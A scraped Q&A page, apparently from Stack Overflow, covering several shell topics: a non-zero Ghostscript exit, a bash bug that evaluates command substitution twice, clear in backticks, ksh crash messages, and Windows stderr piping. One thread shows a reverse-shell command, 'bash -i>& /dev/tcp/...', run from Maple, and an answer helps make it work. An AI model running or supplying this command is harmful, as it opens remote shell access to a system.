PostScript-equivalent to exit(EXIT_FAILURE) - How to exit PostScript with a non-zero exit value? - ghostscript

I know the PostScript equivalent to exit(EXIT_SUCCESS), it is the quit operator. However, the quit operator does not take any arguments, it's just quit, and not 0 quit or 1 quit.
I'm looking for the PostScript equivalent to exit(EXIT_FAILURE). If necessary, it can be assumed that the PostScript interpreter is GhostScript.
It can furthermore be assumed that the normally discouraged behavior of quit of terminating the PostScript interpreter is not just accepted but even desired in this case.

Here's one way that appears to work with simple command line testing.
$ gsnd -q -c 'errordict/handleerror{stop}put (theres-no-file-with-this-name)run'
GPL Ghostscript 9.54.0: Unrecoverable error, exit code 1
$ echo $?
1
Calling run triggers the invalidfileaccess error requested by -dSAFER hidden in the gsnd script. Replacing errordict/handleerror suppresses the printing of the long error report.

Related

bash race condition using generated output file name

I am trying to generate output using a randomized file name. "Generating" is simulated with "cat" in this example:
cat report.csv > "test_$(openssl rand -base64 102).csv"
I often get an error like this:
-bash: test_Q6eheRaVfktCTCfWSU/tjRNA1y+6juwlyuo1lEId/7HZTCQIE7/rt+/9MlTI+pjT
9It3l7FtBldMmaqHNWpspwCI5kCpR+s51RA2o9xAZ6BrZ+7UBR5atK9qWdSO/N/X
BAnvDkGm.csv: No such file or directory
The probability for this error is higher the higher the number of random characters is, which suggests a race condition. Solving the problem by using a variable for the random characters is obvious and is not what I am asking. Rather, my question is: What are the individual steps that bash performs, and where is the race condition?
I would have thought that bash executes the command as follows:
Create a pipe to capture the output of openssl rand
fork/exec openssl rand, passing that file handle as stdout, and wait for the process to finish (and check error status)
read from the pipe to get the value used in string interpolation, then close the pipe
perform string interpolation to build the output file name
open the output file
fork/exec cat, passing the handle for the output file as stdout
wait for the process to finish (and check error status), then close the output file
Nothing here suggests a race condition. I could imagine that bash instead runs cat in parallel and opens another pipe to buffer its output before it goes into the output file, but that wouldn't cause a "No such file or directory" either.
As was commented, slashes in the filename are an obvious problem, but the error occurs even without slashes. Setting the number of random bytes to 8 sometimes produces errors like this, without a slash and with the correct number of characters (so no slash was hidden):
-bash: test_9od1IhDt5A4=.csv: No such file or directory
The following command waits 2 seconds, then runs the command. In exactly those cases where the strange error message appears, it waits 4 seconds instead. Is there some kind of repeat login in bash that does this?
cat report.csv > "test_$(sleep 2; openssl rand -base64 9).csv"
Confirmed the double execution by echoing to stderr instead of sleeping:
cat report.csv > "test_$(echo foo 1>&2; openssl rand -base64 9).csv"
Several things are happening here.
The key part is that an error in the command substitution causes it to be evaluated twice. This seems to be a bug in the bash version used by Apple. The changelog at https://github.com/bminor/bash/blob/master/CHANGES says for version bash-4.3-alpha: "Fixed a bug that could result in double evaluation of command substitutions when they appear in failed redirections." I ran my tests on "GNU bash, version 3.2.57(1)-release (x86_64-apple-darwin18)", the version pre-installed on macOS.
Steps to reproduce this bug in a simple way:
lap47:~/Documents> echo foo > "test_$(echo bar 1>&2; echo 'foo')"
bar
lap47:~/Documents> echo foo > "test_$(echo bar 1>&2; echo 'f/oo')"
bar
bar
-bash: test_f/oo: No such file or directory
lap47:~/Documents>
The second important part is that evaluating the command substitution twice invokes openssl rand twice, producing different random numbers. The second invocation seems to be used to generate the error message after the redirection failed. This way, the error message does not reflect the condition that caused the error.
Finally, the root cause of the failed redirection is indeed a slash in the file name. This failure causes the substitution to be invoked again, producing a different file name which somewhat likely doesn't contain a slash.

using sleep and clear command in bash script

I am learning Bash script.
Inside my script, I've tried clear and sleep 1.
sleep 1 runs as expected but clear runs with command not found error.
Why is that?
clear and sleep 1 are enclosed within backslashes in my script. Stack Overflow is using those symbols to indicate code, and I don't know how to use escape symbols to type them here.
I assume you are trying this :
$(clear)
Or this
`clear`
These are two ways of expression command substitution. The first one is more readable and should be preferred, but they do the same thing.
The solution is to simply use this:
clear
Now, if you are interested in understanding why you are getting this error, here is a longer explanation.
Command substitution captures the output of the command enclosed -- the output of standard output (file descriptor 1), not standard error (standard error), to be more precise -- and then provides this output as a string to be used as part of the command where it was found, as if it had been part of the command to start with (but not subject to further expansions).
The clear command has a special output that causes the terminal screen to clear. But by enclosing clear in backticks, this special output is not sent to the terminal (the terminal does not clear), and it is instead captured by the command substitution. Then, this special output is provided as if it had been typed on the command line, and since it is the first (and only) thing on that line, the shell tries to find a command with a name equal to that special character, which it does not find, and that is where you get the "command not found" error.
Just for fun, try this :
$(clear >&2)
It will clear the screen, and not trigger an error, because the output is redirected to file descriptor 2 (standard error), which is not captured by the command substitution and actually is sent to the terminal (which clears), and since there is no other output, the command substitution evaluates to an empty string, which Bash interprets as a request to do nothing (Bash does not try to find a command with a zero-length name).
I hope this helps you understand the reason you are getting this error.
The backquotes are used in Stack Overflow indicating the a string should be shown as code. Your real code doesn't need backquotes:
echo "Hello from commandline"
sleep 3
echo "After sleeping, will try to use clear in 4 seconds"
sleep 1
echo "will try to use clear in 3 seconds"
sleep 1
echo "will try to use clear in 2 seconds"
sleep 1
echo "will try to use clear in 1 seconds"
sleep 1
clear
When you have seen backquotes in Unix code, you see an old fashioned way to call another command during the execution of a command.
echo "Current time is `date`, so hurry!"
Now we write this as
echo "Current time is $(date), so hurry!"
It is one char more in this simple case, but much better when nesting more things. I will not even try to write the next example with backquotes
echo "Previous command returned $(echo "Current time is $(date), so hurry!")."

bash: &: No such file or directory

I am running the following command from maple (the function system works just like functions such as os.system from python):
system("bash -i>& /dev/tcp/myownip/myport 0>&1 2>&1")
However, it fails and this is the output:
bash: no job control in this shell bash: &: No such file or directory
Exit Value: 127
The weird thing is that the command works great when calling it from Terminal...
Any suggestions of how I could fix this?
"No job control" means that you can't bring background jobs into the foreground when running an interactive shell.
I would focus the analysis on the wording of the second error message. We know from it that bash is running. My guess is that Maple (not knowing the meaning of the > WORD construct in bash) tokenizes the string along the white space, and then does something like execv("bash", "bash", "-i>0", "/dev/tcp/myownip/myport"). At least this would explain the error message.
Could you try the following? Create a stand-alone two-line bash script like this:
#!/usr/bin/bash
bash -i>& /dev/tcp/myownip/myport 0>&1 2>&1
Set it to executable, and then invoke it from Maple with
system("yourpath/yourscript")
At least the error message No such file or directory should be gone.

avoid error message on command crash in ksh

I have a program that crashes. I know it does, it's supposed to in order to test some trap handling. The crash is expected behavior.
When I run the program from ksh, the shell insists on printing helpful little messages like:
./fpe.ksh: line 9: 105778: Floating exception
How do I make it stop that? I want the shell script to ignore the crash and keep going,
without the error message.
For whatever program is on line 9:
program 2> >(sed '/FLoating exception/d')
Find the command that it's erroring and add 2>&1 to the end e.g:
command > /dev/null 2>&1

Redirection standard error & ouput streams is postponed

I need to redirect output & error streams from one Windows process (GNU make.exe executing armcc toolchain) to some filter written on perl. The command I am running is:
Make Release 2>&1 | c:\cygwin\bin\perl ../tools/armfilt.pl
The compilation process throws out some prints which should be put then to STDOUT after some modifications. But I encountered a problem: all prints generated by the make are actually postponed till end of the make's process and only then are shown to a user. So, my questions are:
Why has it happen? I have tried to change the second process (perl.exe) priority from "Normal" to "Above normal" but it didn't help...
How to overcome this problem?
I think that one of possible workarounds may be to send only STDERR prints to the perl (that is what I actually need), not STDOUT+STDERR. But I don't know how to do it in Windows.
The Microsoft explanation concerning pipe operator usage says:
The pipe operator (|) takes the output (by default, STDOUT) of one
command and directs it into the input (by default, STDIN) of another
command.
But how to change this default STDOUT piping is not explained. Is it possible at all?

Resources